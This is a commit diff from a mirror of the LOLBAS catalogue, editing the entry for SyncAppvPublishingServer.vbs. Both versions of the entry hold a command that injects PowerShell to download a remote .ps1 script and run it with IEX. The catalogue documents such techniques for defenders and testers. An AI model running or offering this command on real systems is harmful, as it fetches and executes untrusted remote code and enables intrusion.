mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-29 05:31:53 +02:00
@@ -1,10 +1,10 @@
|
||||
---
|
||||
Name: Syncappvpublishingserver.vbs
|
||||
Description: Script used related to app-v and publishing server
|
||||
Author: 'Oddvar Moe'
|
||||
Author: Oddvar Moe
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
||||
- Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX"
|
||||
Description: Inject PowerShell script code with the provided arguments
|
||||
Usecase: Use Powershell host invoked from vbs script
|
||||
Category: Execute
|
||||
|
Reference in New Issue
Block a user